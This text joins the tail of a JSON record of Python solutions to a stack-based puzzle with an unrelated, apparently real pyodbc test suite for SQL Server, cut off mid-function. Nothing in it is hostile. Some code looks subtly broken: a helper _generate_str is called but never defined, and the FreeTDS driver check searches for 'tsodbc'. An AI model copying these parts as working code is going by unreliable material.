"step-4": "from collections import deque\nd_stack = deque()\nres_stack = deque()\ns = input()\nfor i in range(len(s)):\n if s[i] == '\\\\':\n d_stack.append(i)\n elif s[i] == '/':\n if len(d_stack) == 0:\n continue\n left = d_stack.pop()\n area = i - left\n if len(res_stack) > 0:\n flag = True\n mergeareasum = 0\n while flag:\n if len(res_stack) > 0 and left < res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n else:\n flag = False\n res_stack.append((left, area + mergeareasum))\n else:\n res_stack.append((left, area))\nans = 0\nv_devided = []\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided) > 0:\n print(len(v_devided), ' '.join(v_devided))\nelse:\n print(0)\n",
"step-5": "#alds13c\nfrom collections import deque\n\nd_stack=deque()\nres_stack=deque()\ns = input()\n\nfor i in range(len(s)):\n #print(d_stack,res_stack)\n if s[i]==\"\\\\\":\n d_stack.append(i)\n elif s[i]==\"/\":\n if len(d_stack)==0:\n continue\n left = d_stack.pop()\n area = i-left\n #res_stack.append((left,area))\n if len(res_stack)>0:\n flag=True\n #merge_candidate = []\n mergeareasum=0\n while flag:\n if len(res_stack)>0 and left<res_stack[-1][0]:\n mc = res_stack.pop()\n mergeareasum += mc[1]\n #res_stack.append((left,under[1]+area))\n else:\n flag = False\n res_stack.append((left,area+mergeareasum))\n else:\n res_stack.append((left,area))\n\nans=0\nv_devided=[]\nfor pair in res_stack:\n ans += pair[1]\n v_devided.append(str(pair[1]))\nprint(ans)\nif len(v_devided)>0:\n print(len(v_devided),\" \".join(v_devided))\nelse:\n print(0)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
#!/usr/bin/python
# -*- coding: utf-8 -*-
import os, uuid, re, sys
from decimal import Decimal
from datetime import date, time, datetime
from functools import lru_cache
from typing import Iterator
import pyodbc, pytest
# WARNING: Wow, Microsoft always manages to do the stupidest thing possible, always trying to
# be smarter than everyone. I have worked with their APIs since before "OLE" and it has
# always been a nanny state. They won't read the UID and PWD from odbc.ini because it isn't
# secure. Really? Less secure than what? The next hack someone is going to use. Do the
# straightforward thing and explain how to secure it. It isn't their business how I deploy
# and secure.
#
# For every other DB we use a single default DSN, but you can pass your own via an
# environment variable. For SQL Server, we can't just use a default DSN unless you want to go
# trusted. (Which is more secure? No.) It'll be put into .bashrc most likely. Way to go. Now
# I'll go rename all of the others to DB-specific names instead of PYODBC_CNXNSTR. Hot
# garbage as usual.
CNXNSTR = os.environ.get('PYODBC_SQLSERVER', 'DSN=pyodbc-sqlserver')
def connect(autocommit=False, attrs_before=None):
return pyodbc.connect(CNXNSTR, autocommit=autocommit, attrs_before=attrs_before)
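# Example (hypothetical) value for the environment variable above, for running the
# suite without maintaining a DSN -- server name and credentials are placeholders:
#
#   export PYODBC_SQLSERVER='DRIVER={ODBC Driver 18 for SQL Server};SERVER=localhost;DATABASE=test;UID=me;PWD=secret;TrustServerCertificate=yes'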
DRIVER = connect().getinfo(pyodbc.SQL_DRIVER_NAME)
IS_FREEDTS = bool(re.search('tsodbc', DRIVER, flags=re.IGNORECASE))
IS_MSODBCSQL = bool(re.search(r'(msodbcsql|sqlncli|sqlsrv32\.dll)', DRIVER, re.IGNORECASE))
def _get_sqlserver_year():
"""
Returns the release year of the current version of SQL Server, used to skip tests for
features that are not supported. If the current DB is not SQL Server, 0 is returned.
"""
# We used to use the major version, but most documentation on the web refers to the year
# (e.g. SQL Server 2019) so we'll use that for skipping tests that do not apply.
if not IS_MSODBCSQL:
return 0
cnxn = connect()
cursor = cnxn.cursor()
row = cursor.execute("exec master..xp_msver 'ProductVersion'").fetchone()
major = row.Character_Value.split('.', 1)[0]
return {
# https://sqlserverbuilds.blogspot.com/
'8': 2000, '9': 2005, '10': 2008, '11': 2012, '12': 2014,
'13': 2016, '14': 2017, '15': 2019, '16': 2022
}[major]
SQLSERVER_YEAR = _get_sqlserver_year()
@pytest.fixture()
def cursor() -> Iterator[pyodbc.Cursor]:
cnxn = connect()
cur = cnxn.cursor()
cur.execute("drop table if exists t1")
cur.execute("drop table if exists t2")
cur.execute("drop table if exists t3")
cnxn.commit()
yield cur
if not cnxn.closed:
cur.close()
cnxn.close()
def test_text(cursor: pyodbc.Cursor):
_test_vartype(cursor, 'text')
def test_varchar(cursor: pyodbc.Cursor):
_test_vartype(cursor, 'varchar')
def test_nvarchar(cursor: pyodbc.Cursor):
_test_vartype(cursor, 'nvarchar')
def test_varbinary(cursor: pyodbc.Cursor):
_test_vartype(cursor, 'varbinary')
@pytest.mark.skipif(SQLSERVER_YEAR < 2005, reason='(max) not supported until 2005')
def test_unicode_longmax(cursor: pyodbc.Cursor):
# Issue 188: Segfault when fetching NVARCHAR(MAX) data over 511 bytes
cursor.execute("select cast(replicate(N'x', 512) as nvarchar(max))")
def test_char(cursor: pyodbc.Cursor):
value = "testing"
cursor.execute("create table t1(s char(7))")
cursor.execute("insert into t1 values(?)", "testing")
v = cursor.execute("select * from t1").fetchone()[0]
assert v == value
def test_int(cursor: pyodbc.Cursor):
_test_scalar(cursor, 'int', [None, -1, 0, 1, 12345678])
def test_bigint(cursor: pyodbc.Cursor):
_test_scalar(cursor, 'bigint', [None, -1, 0, 1, 0x123456789, 0x7FFFFFFF, 0xFFFFFFFF,
0x123456789])
def test_overflow_int(cursor: pyodbc.Cursor):
# python allows integers of any size, bigger than an 8 byte int can contain
input = 9999999999999999999999999999999999999
cursor.execute("create table t1(d bigint)")
with pytest.raises(OverflowError):
cursor.execute("insert into t1 values (?)", input)
result = cursor.execute("select * from t1").fetchall()
assert result == []
def test_float(cursor: pyodbc.Cursor):
_test_scalar(cursor, 'float', [None, -200, -1, 0, 1, 1234.5, -200, .00012345])
def test_non_numeric_float(cursor: pyodbc.Cursor):
cursor.execute("create table t1(d float)")
for input in (float('+Infinity'), float('-Infinity'), float('NaN')):
with pytest.raises(pyodbc.ProgrammingError):
cursor.execute("insert into t1 values (?)", input)
def test_drivers():
p = pyodbc.drivers()
assert isinstance(p, list)
def test_datasources():
p = pyodbc.dataSources()
assert isinstance(p, dict)
def test_getinfo_string():
cnxn = connect()
value = cnxn.getinfo(pyodbc.SQL_CATALOG_NAME_SEPARATOR)
assert isinstance(value, str)
def test_getinfo_bool():
cnxn = connect()
value = cnxn.getinfo(pyodbc.SQL_ACCESSIBLE_TABLES)
assert isinstance(value, bool)
def test_getinfo_int():
cnxn = connect()
value = cnxn.getinfo(pyodbc.SQL_DEFAULT_TXN_ISOLATION)
assert isinstance(value, int)
def test_getinfo_smallint():
cnxn = connect()
value = cnxn.getinfo(pyodbc.SQL_CONCAT_NULL_BEHAVIOR)
assert isinstance(value, int)
def test_no_fetch(cursor: pyodbc.Cursor):
# Issue 89 with FreeTDS: Multiple selects (or catalog functions that issue selects) without
# fetches seem to confuse the driver.
cursor.execute('select 1')
cursor.execute('select 1')
cursor.execute('select 1')
def test_decode_meta(cursor: pyodbc.Cursor):
"""
Ensure column names with non-ASCII characters are converted using the configured encodings.
"""
# This is from GitHub issue #190
cursor.execute("create table t1(a int)")
cursor.execute("insert into t1 values (1)")
cursor.execute('select a as "Tipología" from t1')
assert cursor.description[0][0] == "Tipología"
def test_exc_integrity(cursor: pyodbc.Cursor):
"Make sure an IntegretyError is raised"
# This is really making sure we are properly encoding and comparing the SQLSTATEs.
cursor.execute("create table t1(s1 varchar(10) primary key)")
cursor.execute("insert into t1 values ('one')")
with pytest.raises(pyodbc.IntegrityError):
cursor.execute("insert into t1 values ('one')")
def test_multiple_bindings(cursor: pyodbc.Cursor):
"More than one bind and select on a cursor"
cursor.execute("create table t1(n int)")
cursor.execute("insert into t1 values (?)", 1)
cursor.execute("insert into t1 values (?)", 2)
cursor.execute("insert into t1 values (?)", 3)
for _ in range(3):
cursor.execute("select n from t1 where n < ?", 10)
cursor.execute("select n from t1 where n < 3")
def test_different_bindings(cursor: pyodbc.Cursor):
cursor.execute("create table t1(n int)")
cursor.execute("create table t2(d datetime)")
cursor.execute("insert into t1 values (?)", 1)
cursor.execute("insert into t2 values (?)", datetime.now())
SMALL_FENCEPOST_SIZES = [None, 0, 1, 255, 256, 510, 511, 512, 1023, 1024, 2047, 2048, 4000]
LARGE_FENCEPOST_SIZES = SMALL_FENCEPOST_SIZES + [4095, 4096, 4097, 10 * 1024, 20 * 1024]
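# (These sizes bracket common internal buffer boundaries -- 255/256, 511/512,
# 1023/1024, 2047/2048, 4095/4096/4097 -- to catch off-by-one "fencepost"
# truncation bugs.)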
def _test_vartype(cursor: pyodbc.Cursor, datatype):
if datatype == 'text':
lengths = LARGE_FENCEPOST_SIZES
else:
lengths = SMALL_FENCEPOST_SIZES
if datatype == 'text':
cursor.execute(f"create table t1(c1 {datatype})")
else:
maxlen = lengths[-1]
cursor.execute(f"create table t1(c1 {datatype}({maxlen}))")
for length in lengths:
cursor.execute("delete from t1")
        encoding = 'utf8' if datatype in ('blob', 'varbinary') else None
value = _generate_str(length, encoding=encoding)
try:
cursor.execute("insert into t1 values(?)", value)
except pyodbc.Error as ex:
msg = f'{datatype} insert failed: length={length} len={len(value)}'
raise Exception(msg) from ex
v = cursor.execute("select * from t1").fetchone()[0]
assert v == value
def _test_scalar(cursor: pyodbc.Cursor, datatype, values):
"""
A simple test wrapper for types that are identical when written and read.
"""
cursor.execute(f"create table t1(c1 {datatype})")
for value in values:
cursor.execute("delete from t1")
cursor.execute("insert into t1 values (?)", value)
v = cursor.execute("select c1 from t1").fetchone()[0]
assert v == value
def test_noscan(cursor: pyodbc.Cursor):
assert cursor.noscan is False
cursor.noscan = True
assert cursor.noscan is True
def test_nonnative_uuid(cursor: pyodbc.Cursor):
# The default is False meaning we should return a string. Note that
# SQL Server seems to always return uppercase.
value = uuid.uuid4()
cursor.execute("create table t1(n uniqueidentifier)")
cursor.execute("insert into t1 values (?)", value)
pyodbc.native_uuid = False
result = cursor.execute("select n from t1").fetchval()
assert isinstance(result, str)
assert result == str(value).upper()
pyodbc.native_uuid = True
def test_native_uuid(cursor: pyodbc.Cursor):
# When true, we should return a uuid.UUID object.
value = uuid.uuid4()
cursor.execute("create table t1(n uniqueidentifier)")
cursor.execute("insert into t1 values (?)", value)
pyodbc.native_uuid = True
result = cursor.execute("select n from t1").fetchval()
assert isinstance(result, uuid.UUID)
assert value == result
def test_nextset(cursor: pyodbc.Cursor):
cursor.execute("create table t1(i int)")
for i in range(4):
cursor.execute("insert into t1(i) values(?)", i)
cursor.execute(
"""
select i from t1 where i < 2 order by i;
select i from t1 where i >= 2 order by i
""")
for i, row in enumerate(cursor):
assert i == row.i
assert cursor.nextset()
for i, row in enumerate(cursor):
assert i + 2 == row.i
@pytest.mark.skipif(IS_FREEDTS, reason='https://github.com/FreeTDS/freetds/issues/230')
def test_nextset_with_raiserror(cursor: pyodbc.Cursor):
cursor.execute("select i = 1; RAISERROR('c', 16, 1);")
row = next(cursor)
assert 1 == row.i
with pytest.raises(pyodbc.ProgrammingError):
cursor.nextset()
def test_fixed_unicode(cursor: pyodbc.Cursor):
value = "t\xebsting"
cursor.execute("create table t1(s nchar(7))")
cursor.execute("insert into t1 values(?)", "t\xebsting")
v = cursor.execute("select * from t1").fetchone()[0]
assert isinstance(v, str)
assert len(v) == len(value)
# If we alloc'd wrong, the test below might work because of an embedded NULL
assert v == value
def test_chinese(cursor: pyodbc.Cursor):
v = '我的'
cursor.execute("SELECT N'我的' AS [Name]")
row = cursor.fetchone()
assert row[0] == v
cursor.execute("SELECT N'我的' AS [Name]")
rows = cursor.fetchall()
assert rows[0][0] == v
def test_bit(cursor: pyodbc.Cursor):
value = True
cursor.execute("create table t1(b bit)")
cursor.execute("insert into t1 values (?)", value)
v = cursor.execute("select b from t1").fetchone()[0]
assert isinstance(v, bool)
assert v == value
def test_decimal(cursor: pyodbc.Cursor):
# From test provided by planders (thanks!) in Issue 91
for (precision, scale, negative) in [
(1, 0, False), (1, 0, True), (6, 0, False), (6, 2, False), (6, 4, True),
(6, 6, True), (38, 0, False), (38, 10, False), (38, 38, False), (38, 0, True),
(38, 10, True), (38, 38, True)]:
try:
cursor.execute("drop table t1")
except:
pass
cursor.execute(f"create table t1(d decimal({precision}, {scale}))")
# Construct a decimal that uses the maximum precision and scale.
sign = negative and '-' or ''
before = '9' * (precision - scale)
after = scale and ('.' + '9' * scale) or ''
decStr = f'{sign}{before}{after}'
value = Decimal(decStr)
cursor.execute("insert into t1 values(?)", value)
v = cursor.execute("select d from t1").fetchone()[0]
assert v == value
def test_decimal_e(cursor: pyodbc.Cursor):
"""Ensure exponential notation decimals are properly handled"""
value = Decimal((0, (1, 2, 3), 5)) # prints as 1.23E+7
cursor.execute("create table t1(d decimal(10, 2))")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select * from t1").fetchone()[0]
assert result == value
def test_subquery_params(cursor: pyodbc.Cursor):
"""Ensure parameter markers work in a subquery"""
cursor.execute("create table t1(id integer, s varchar(20))")
cursor.execute("insert into t1 values (?,?)", 1, 'test')
row = cursor.execute("""
select x.id
from (
select id
from t1
where s = ?
and id between ? and ?
) x
""", 'test', 1, 10).fetchone()
assert row is not None
assert row[0] == 1
def test_close_cnxn():
"""Make sure using a Cursor after closing its connection doesn't crash."""
cnxn = connect()
cursor = cnxn.cursor()
cursor.execute("drop table if exists t1")
cursor.execute("create table t1(id integer, s varchar(20))")
cursor.execute("insert into t1 values (?,?)", 1, 'test')
cursor.execute("select * from t1")
cnxn.close()
# Now that the connection is closed, we expect an exception. (If the code attempts to use
# the HSTMT, we'll get an access violation instead.)
with pytest.raises(pyodbc.ProgrammingError):
cursor.execute("select * from t1")
def test_empty_string(cursor: pyodbc.Cursor):
cursor.execute("create table t1(s varchar(20))")
cursor.execute("insert into t1 values(?)", "")
def test_empty_string_encoding():
cnxn = connect()
cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')
value = ""
cursor = cnxn.cursor()
cursor.execute("create table t1(s varchar(20))")
cursor.execute("insert into t1 values(?)", value)
v = cursor.execute("select * from t1").fetchone()[0]
assert v == value
def test_fixed_str(cursor: pyodbc.Cursor):
value = "testing"
cursor.execute("create table t1(s char(7))")
cursor.execute("insert into t1 values(?)", value)
v = cursor.execute("select * from t1").fetchone()[0]
assert isinstance(v, str)
assert len(v) == len(value)
# If we alloc'd wrong, the test below might work because of an embedded NULL
assert v == value
def test_empty_unicode(cursor: pyodbc.Cursor):
cursor.execute("create table t1(s nvarchar(20))")
cursor.execute("insert into t1 values(?)", "")
def test_empty_unicode_encoding():
cnxn = connect()
cnxn.setdecoding(pyodbc.SQL_CHAR, encoding='shift_jis')
value = ""
cursor = cnxn.cursor()
cursor.execute("create table t1(s nvarchar(20))")
cursor.execute("insert into t1 values(?)", value)
v = cursor.execute("select * from t1").fetchone()[0]
assert v == value
def test_negative_row_index(cursor: pyodbc.Cursor):
cursor.execute("create table t1(s varchar(20))")
cursor.execute("insert into t1 values(?)", "1")
row = cursor.execute("select * from t1").fetchone()
assert row[0] == "1"
assert row[-1] == "1"
def test_version():
assert 3 == len(pyodbc.version.split('.')) # 1.3.1 etc.
@pytest.mark.skipif(IS_MSODBCSQL and SQLSERVER_YEAR < 2008,
reason='Date not supported until 2008?')
def test_date(cursor: pyodbc.Cursor):
value = date.today()
cursor.execute("create table t1(d date)")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select d from t1").fetchone()[0]
assert isinstance(result, date)
assert value == result
@pytest.mark.skipif(IS_MSODBCSQL and SQLSERVER_YEAR < 2008,
reason='Time not supported until 2008?')
def test_time(cursor: pyodbc.Cursor):
value = datetime.now().time()
# We aren't yet writing values using the new extended time type so the value written to the
# database is only down to the second.
value = value.replace(microsecond=0)
cursor.execute("create table t1(t time)")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select t from t1").fetchone()[0]
assert isinstance(result, time)
assert value == result
def test_datetime(cursor: pyodbc.Cursor):
value = datetime(2007, 1, 15, 3, 4, 5)
cursor.execute("create table t1(dt datetime)")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select dt from t1").fetchone()[0]
assert isinstance(result, datetime)
assert value == result
def test_datetime_fraction(cursor: pyodbc.Cursor):
    # SQL Server supports milliseconds, but Python's datetime supports microseconds, so the
    # most granular datetime supported is xxx000.
value = datetime(2007, 1, 15, 3, 4, 5, 123000)
cursor.execute("create table t1(dt datetime)")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select dt from t1").fetchone()[0]
assert isinstance(result, datetime)
assert value == result
def test_datetime_fraction_rounded(cursor: pyodbc.Cursor):
    # SQL Server supports milliseconds, but Python's datetime supports microseconds. pyodbc
# rounds down to what the database supports.
full = datetime(2007, 1, 15, 3, 4, 5, 123456)
rounded = datetime(2007, 1, 15, 3, 4, 5, 123000)
cursor.execute("create table t1(dt datetime)")
cursor.execute("insert into t1 values (?)", full)
result = cursor.execute("select dt from t1").fetchone()[0]
assert isinstance(result, datetime)
assert rounded == result
def test_datetime2(cursor: pyodbc.Cursor):
value = datetime(2007, 1, 15, 3, 4, 5)
cursor.execute("create table t1(dt datetime2)")
cursor.execute("insert into t1 values (?)", value)
result = cursor.execute("select dt from t1").fetchone()[0]
assert isinstance(result, datetime)
assert value == result
def test_sp_results(cursor: pyodbc.Cursor):
cursor.execute(
"""
Create procedure proc1
AS
select top 10 name, id, xtype, refdate
from sysobjects
""")
rows = cursor.execute("exec proc1").fetchall()
assert isinstance(rows, list)
assert len(rows) == 10 # there has to be at least 10 items in sysobjects
assert isinstance(rows[0].refdate, datetime)
def test_sp_results_from_temp(cursor: pyodbc.Cursor):
# Note: I've used "set nocount on" so that we don't get the number of rows deleted from
# #tmptable. If you don't do this, you'd need to call nextset() once to skip it.
cursor.execute(
"""
Create procedure proc1
AS
set nocount on
select top 10 name, id, xtype, refdate
into #tmptable
from sysobjects
select * from #tmptable
""")
cursor.execute("exec proc1")
assert cursor.description is not None
assert len(cursor.description) == 4
rows = cursor.fetchall()
assert isinstance(rows, list)
assert len(rows) == 10 # there has to be at least 10 items in sysobjects
assert isinstance(rows[0].refdate, datetime)
def test_sp_results_from_vartbl(cursor: pyodbc.Cursor):
cursor.execute(
"""
Create procedure proc1
AS
set nocount on
declare @tmptbl table(name varchar(100), id int, xtype varchar(4), refdate datetime)
insert into @tmptbl
select top 10 name, id, xtype, refdate
from sysobjects
select * from @tmptbl
""")
cursor.execute("exec proc1")
rows = cursor.fetchall()
assert isinstance(rows, list)
assert len(rows) == 10 # there has to be at least 10 items in sysobjects
assert isinstance(rows[0].refdate, datetime)
def test_sp_with_dates(cursor: pyodbc.Cursor):
# Reported in the forums that passing two datetimes to a stored procedure doesn't work.
cursor.execute(
"""
if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')
and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[test_sp]
""")
cursor.execute(
"""
create procedure test_sp(@d1 datetime, @d2 datetime)
AS
declare @d as int
set @d = datediff(year, @d1, @d2)
select @d
""")
cursor.execute("exec test_sp ?, ?", datetime.now(), datetime.now())
rows = cursor.fetchall()
assert rows is not None
assert rows[0][0] == 0 # 0 years apart
def test_sp_with_none(cursor: pyodbc.Cursor):
# Reported in the forums that passing None caused an error.
cursor.execute(
"""
if exists (select * from dbo.sysobjects where id = object_id(N'[test_sp]')
and OBJECTPROPERTY(id, N'IsProcedure') = 1)
drop procedure [dbo].[test_sp]
""")
cursor.execute(
"""
create procedure test_sp(@x varchar(20))
AS
declare @y varchar(20)
set @y = @x
select @y
""")
cursor.execute("exec test_sp ?", None)
rows = cursor.fetchall()
assert rows is not None
    assert rows[0][0] is None  # the None we passed in comes back as None
#
# rowcount
#
def test_rowcount_delete(cursor: pyodbc.Cursor):
assert cursor.rowcount == -1
cursor.execute("create table t1(i int)")
count = 4
for i in range(count):
cursor.execute("insert into t1 values (?)", i)
cursor.execute("delete from t1")
assert cursor.rowcount == count
def test_rowcount_nodata(cursor: pyodbc.Cursor):
"""
This represents a different code path than a delete that deleted something.
The return value is SQL_NO_DATA and code after it was causing an error. We could use
SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount
code. On the other hand, we could hardcode a zero return value.
"""
cursor.execute("create table t1(i int)")
# This is a different code path internally.
cursor.execute("delete from t1")
assert cursor.rowcount == 0
def test_rowcount_select(cursor: pyodbc.Cursor):
"""
Ensure Cursor.rowcount is set properly after a select statement.
pyodbc calls SQLRowCount after each execute and sets Cursor.rowcount, but SQL Server 2005
returns -1 after a select statement, so we'll test for that behavior. This is valid
behavior according to the DB API specification, but people don't seem to like it.
"""
cursor.execute("create table t1(i int)")
count = 4
for i in range(count):
cursor.execute("insert into t1 values (?)", i)
cursor.execute("select * from t1")
assert cursor.rowcount == -1
rows = cursor.fetchall()
assert len(rows) == count
assert cursor.rowcount == -1
def test_rowcount_reset(cursor: pyodbc.Cursor):
"Ensure rowcount is reset after DDL"
cursor.execute("create table t1(i int)")
count = 4
for i in range(count):
cursor.execute("insert into t1 values (?)", i)
assert cursor.rowcount == 1
cursor.execute("create table t2(i int)")
ddl_rowcount = (0 if IS_FREEDTS else -1)
assert cursor.rowcount == ddl_rowcount
def test_retcursor_delete(cursor: pyodbc.Cursor):
cursor.execute("create table t1(i int)")
cursor.execute("insert into t1 values (1)")
v = cursor.execute("delete from t1")
assert v == cursor
def test_retcursor_nodata(cursor: pyodbc.Cursor):
"""
This represents a different code path than a delete that deleted something.
The return value is SQL_NO_DATA and code after it was causing an error. We could use
SQL_NO_DATA to step over the code that errors out and drop down to the same SQLRowCount
code.
"""
cursor.execute("create table t1(i int)")
# This is a different code path internally.
v = cursor.execute("delete from t1")
assert v == cursor
def test_retcursor_select(cursor: pyodbc.Cursor):
cursor.execute("create table t1(i int)")
cursor.execute("insert into t1 values (1)")
v = cursor.execute("select * from t1")
assert v == cursor
def table_with_spaces(cursor: pyodbc.Cursor):
"Ensure we can select using [x z] syntax"
try:
cursor.execute("create table [test one](int n)")
cursor.execute("insert into [test one] values(1)")
cursor.execute("select * from [test one]")
v = cursor.fetchone()[0]
assert v == 1
finally:
cursor.rollback()
def test_lower_case():
"Ensure pyodbc.lowercase forces returned column names to lowercase."
try:
pyodbc.lowercase = True
cnxn = connect()
cursor = cnxn.cursor()
cursor.execute("create table t1(Abc int, dEf int)")
cursor.execute("select * from t1")
names = [t[0] for t in cursor.description]
names.sort()
assert names == ["abc", "def"]
finally:
# Put it back so other tests don't fail.
pyodbc.lowercase = False
def test_row_description(cursor: pyodbc.Cursor):
"""
Ensure Cursor.description is accessible as Row.cursor_description.
"""
cursor.execute("create table t1(a int, b char(3))")
cursor.execute("insert into t1 values(1, 'abc')")
row = cursor.execute("select * from t1").fetchone()
assert cursor.description == row.cursor_description
def test_temp_select(cursor: pyodbc.Cursor):
# A project was failing to create temporary tables via select into.
cursor.execute("create table t1(s char(7))")
cursor.execute("insert into t1 values(?)", "testing")
v = cursor.execute("select * from t1").fetchone()[0]
assert isinstance(v, str)
assert v == "testing"
cursor.execute("select s into t2 from t1")
v = cursor.execute("select * from t1").fetchone()[0]
assert isinstance(v, str)
assert v == "testing"
def test_executemany(cursor: pyodbc.Cursor):
cursor.execute("create table t1(a int, b varchar(10))")
params = [(i, str(i)) for i in range(1, 6)]
cursor.executemany("insert into t1(a, b) values (?,?)", params)
count = cursor.execute("select count(*) from t1").fetchone()[0]
assert count == len(params)
cursor.execute("select a, b from t1 order by a")
rows = cursor.fetchall()
assert count == len(rows)
for param, row in zip(params, rows):
assert param[0] == row[0]
assert param[1] == row[1]
def test_executemany_one(cursor: pyodbc.Cursor):
"Pass executemany a single sequence"
cursor.execute("create table t1(a int, b varchar(10))")
params = [(1, "test")]
cursor.executemany("insert into t1(a, b) values (?,?)", params)
count = cursor.execute("select count(*) from t1").fetchone()[0]
assert count == len(params)
cursor.execute("select a, b from t1 order by a")
rows = cursor.fetchall()
assert count == len(rows)
for param, row in zip(params, rows):
assert param[0] == row[0]
assert param[1] == row[1]
def test_executemany_dae_0(cursor: pyodbc.Cursor):
"""
    DAE (data-at-execution) for a 0-length value
"""
cursor.execute("create table t1(a nvarchar(max))")
cursor.fast_executemany = True
cursor.executemany("insert into t1(a) values(?)", [['']])
assert cursor.execute("select a from t1").fetchone()[0] == ''
cursor.fast_executemany = False
def test_executemany_failure(cursor: pyodbc.Cursor):
"""
Ensure that an exception is raised if one query in an executemany fails.
"""
cursor.execute("create table t1(a int, b varchar(10))")
params = [(1, 'good'),
('error', 'not an int'),
(3, 'good')]
with pytest.raises(pyodbc.Error):
cursor.executemany("insert into t1(a, b) value (?, ?)", params)
def test_row_slicing(cursor: pyodbc.Cursor):
cursor.execute("create table t1(a int, b int, c int, d int)")
cursor.execute("insert into t1 values(1,2,3,4)")
row = cursor.execute("select * from t1").fetchone()
result = row[:]
assert result is row
result = row[:-1]
assert result == (1, 2, 3)
result = row[0:4]
assert result is row
def test_row_repr(cursor: pyodbc.Cursor):
cursor.execute("create table t1(a int, b int, c int, d varchar(50))")
cursor.execute("insert into t1 values(1,2,3,'four')")
row = cursor.execute("select * from t1").fetchone()
result = str(row)
assert result == "(1, 2, 3, 'four')"
result = str(row[:-1])
assert result == "(1, 2, 3)"
result = str(row[:1])
assert result == "(1,)"
def test_concatenation(cursor: pyodbc.Cursor):
v2 = '0123456789' * 30
v3 = '9876543210' * 30
cursor.execute("create table t1(c1 int identity(1, 1), c2 varchar(300), c3 varchar(300))")
cursor.execute("insert into t1(c2, c3) values (?,?)", v2, v3)
row = cursor.execute("select c2, c3, c2 + c3 as both from t1").fetchone()
assert row.both == v2 + v3
def test_view_select(cursor: pyodbc.Cursor):
# Reported in forum: Can't select from a view? I think I do this a lot, but another test
# never hurts.
# Create a table (t1) with 3 rows and a view (t2) into it.
cursor.execute("create table t1(c1 int identity(1, 1), c2 varchar(50))")
for i in range(3):
cursor.execute("insert into t1(c2) values (?)", f"string{i}")
cursor.execute("create view t2 as select * from t1")
# Select from the view
cursor.execute("select * from t2")
rows = cursor.fetchall()
assert rows is not None
assert len(rows) == 3
def test_autocommit():
cnxn = connect()
assert cnxn.autocommit is False
cnxn = None
cnxn = connect(autocommit=True)
assert cnxn.autocommit is True
cnxn.autocommit = False
assert cnxn.autocommit is False
def test_sqlserver_callproc(cursor: pyodbc.Cursor):
try:
cursor.execute("drop procedure pyodbctest")
cursor.commit()
except:
pass
cursor.execute("create table t1(s varchar(10))")
cursor.execute("insert into t1 values(?)", "testing")
cursor.execute("""
create procedure pyodbctest @var1 varchar(32)
as
begin
select s from t1
return
end
""")
cursor.execute("exec pyodbctest 'hi'")
def test_skip(cursor: pyodbc.Cursor):
    # Insert 1 through 4.  Fetch 1, skip 2 and 3, fetch 4.
cursor.execute("create table t1(id int)")
for i in range(1, 5):
cursor.execute("insert into t1 values(?)", i)
cursor.execute("select id from t1 order by id")
assert cursor.fetchone()[0] == 1
cursor.skip(2)
assert cursor.fetchone()[0] == 4
def test_timeout():
cnxn = connect()
assert cnxn.timeout == 0 # defaults to zero (off)
cnxn.timeout = 30
assert cnxn.timeout == 30
cnxn.timeout = 0
assert cnxn.timeout == 0
def test_sets_execute(cursor: pyodbc.Cursor):
# Only lists and tuples are allowed.
cursor.execute("create table t1 (word varchar (100))")
words = {'a', 'b', 'c'}
with pytest.raises(pyodbc.ProgrammingError):
cursor.execute("insert into t1 (word) values (?)", words)
with pytest.raises(pyodbc.ProgrammingError):
cursor.executemany("insert into t1 (word) values (?)", words)
def test_row_execute(cursor: pyodbc.Cursor):
"Ensure we can use a Row object as a parameter to execute"
cursor.execute("create table t1(n int, s varchar(10))")
cursor.execute("insert into t1 values (1, 'a')")
row = cursor.execute("select n, s from t1").fetchone()
assert row
cursor.execute("create table t2(n int, s varchar(10))")
cursor.execute("insert into t2 values (?, ?)", row)
def test_row_executemany(cursor: pyodbc.Cursor):
"Ensure we can use a Row object as a parameter to executemany"
cursor.execute("create table t1(n int, s varchar(10))")
for i in range(3):
cursor.execute("insert into t1 values (?, ?)", i, chr(ord('a') + i))
rows = cursor.execute("select n, s from t1").fetchall()
assert len(rows) != 0
cursor.execute("create table t2(n int, s varchar(10))")
cursor.executemany("insert into t2 values (?, ?)", rows)
def test_description(cursor: pyodbc.Cursor):
"Ensure cursor.description is correct"
cursor.execute("create table t1(n int, s varchar(8), d decimal(5,2))")
cursor.execute("insert into t1 values (1, 'abc', '1.23')")
cursor.execute("select * from t1")
    # (I'm not sure the precision of an int is constant across different versions and
    # bitnesses, so I'm hand-checking only the items I do know.)
# int
t = cursor.description[0]
assert t[0] == 'n'
assert t[1] == int
assert t[5] == 0 # scale
assert t[6] is True # nullable
# varchar(8)
t = cursor.description[1]
assert t[0] == 's'
assert t[1] == str
assert t[4] == 8 # precision
assert t[5] == 0 # scale
assert t[6] is True # nullable
# decimal(5, 2)
t = cursor.description[2]
assert t[0] == 'd'
assert t[1] == Decimal
assert t[4] == 5 # precision
assert t[5] == 2 # scale
assert t[6] is True # nullable
def test_cursor_messages_with_print(cursor: pyodbc.Cursor):
"""
Ensure the Cursor.messages attribute is handled correctly with a simple PRINT statement.
"""
assert not cursor.messages
# SQL Server PRINT statements are never more than 8000 characters
# https://docs.microsoft.com/en-us/sql/t-sql/language-elements/print-transact-sql#remarks
for msg in ('hello world', 'ABCDEFGHIJ' * 800):
cursor.execute(f"PRINT '{msg}'")
messages = cursor.messages
assert isinstance(messages, list)
assert len(messages) == 1
assert isinstance(messages[0], tuple)
assert len(messages[0]) == 2
assert isinstance(messages[0][0], str)
assert isinstance(messages[0][1], str)
assert '[01000] (0)' == messages[0][0]
assert messages[0][1].endswith(msg)
def test_cursor_messages_with_stored_proc(cursor: pyodbc.Cursor):
"""
